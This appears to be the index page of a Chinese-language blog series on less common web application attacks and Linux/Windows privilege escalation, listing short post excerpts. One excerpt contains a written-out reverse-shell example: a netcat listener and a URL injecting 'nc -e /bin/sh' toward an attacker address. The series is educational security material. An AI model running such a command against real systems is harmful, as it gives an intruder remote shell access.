鐵人檔案
這個系列主要會介紹一些Web Application攻擊手法和一些Real World的案例以及Windows/Linux的Privilege Escalation。
但一些特別常被人提起的Web Attack如SQL Injection, XSS等等可能就不會在這次系列中出現,取而代之的會是像ORM Injection, HTTP Verb Tampering, HTTP Request Smuggling等等有趣的主題。
前言 你知道Remote Code Execution很嚴重,但你知道有哪些可以觸發RCE嗎? 正文 概念 只要能夠Remote Code Execution,...
前言 :Websocket除了能建立一個雙向通訊通道外,還能幹嘛? :當然是拿來Injection阿 正文 概念 Websocket允許客戶端或Server建立...
前言 被Netflix fixation了,差點忘記發文 正文 概念 CWE-384 Authenticating a user, or otherwise...
前言 $nc -lvnp 1337 http://shhhhh.com/?cmd=nc%20-e%20/bin/sh%2010.0.0.1%201337 $id...
正文 概念 JSON 是一個以純文字為基礎去生成的簡單結構,可以很簡單的與其他應用程式交換資料、傳遞訊息。但若是讓未經驗證的input在應用程式中執行,就會引發...
前言 前面介紹過很多各種各樣的web application攻擊手法,今天來介紹Business Logic中引發的問題 正文 Business Logic E...
前言 前面介紹了很多Web攻擊,今天來講講組合技吧 正文 在真實世界(real-world)的惡意攻擊中,攻擊者只依靠單一的漏洞進行利用反而不常見,常常是組合各...
前言 快要結束了,今明兩天會講點拿下Server Initial Access(foothold)之後的權限提升。 正文 在滲透測試期間,若是成功拿到Initi...
前言 昨天的Linux PrivEsc中已經介紹過提權的基本概念了,所以今天就直接進入正題吧 正文 與Linux的提權一樣,有一些常見的Windows提權手段,...
正文 今天最後一天了,當初因為沒存稿的關係,加上很多主題想寫,但又沒把握能寫好,所以不知道能不能順利完賽XD。 Web應用程式的攻擊其實還有很多,像是SSRF、...
